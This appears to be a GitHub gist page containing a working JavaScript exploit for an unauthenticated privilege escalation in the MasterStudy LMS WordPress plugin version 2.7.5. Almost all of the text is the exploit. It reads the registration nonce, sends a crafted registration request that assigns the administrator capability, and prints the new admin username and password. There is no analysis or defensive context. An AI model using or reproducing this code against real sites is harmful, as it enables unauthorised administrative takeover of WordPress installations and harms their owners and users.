Skip to content

Instantly share code, notes, and snippets.

@hxlxmjxbbxs
Forked from numanturle/Exploit.js
Created May 31, 2022 19:51
Show Gist options
  • Save hxlxmjxbbxs/5b4b968643921b7382bcdceec57f5213 to your computer and use it in GitHub Desktop.
Save hxlxmjxbbxs/5b4b968643921b7382bcdceec57f5213 to your computer and use it in GitHub Desktop.
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
function randomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
jQuery(document).ready(function($){
username = "poctesting"+randomInt(1,1337);
password_poc = "S3cr3t"+randomInt(1,1337);
nonce = stm_lms_nonces.stm_lms_register
post_data = {
"user_login":username,
"user_email":username+"@"+window.location.host,
"user_password":password_poc,
"user_password_re":password_poc,
"become_instructor":"",
"privacy_policy":true,
"degree":"",
"expertize":"",
"auditory":"",
"additional":[],
"additional_instructors":[],
"profile_default_fields_for_register":{
"wp_capabilities":{
"value":{
"administrator":1
}
}
}
}
$.ajax({
type: "POST",
url: stm_lms_ajaxurl+"?action=stm_lms_register&nonce="+nonce,
data: JSON.stringify(post_data),
contentType: "application/json; charset=utf-8",
dataType: "json",
success: function(data){
if(data.status == "success"){
//window.location.href = "wp-admin/"
console.log('%cRegistration Successful', 'color: black; background: yellow; font-size: 30px');
console.log("Username : " + username);
console.log("Password : " + password_poc);
}
},
error: function(errMsg) {
console.log(errMsg);
}
});
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment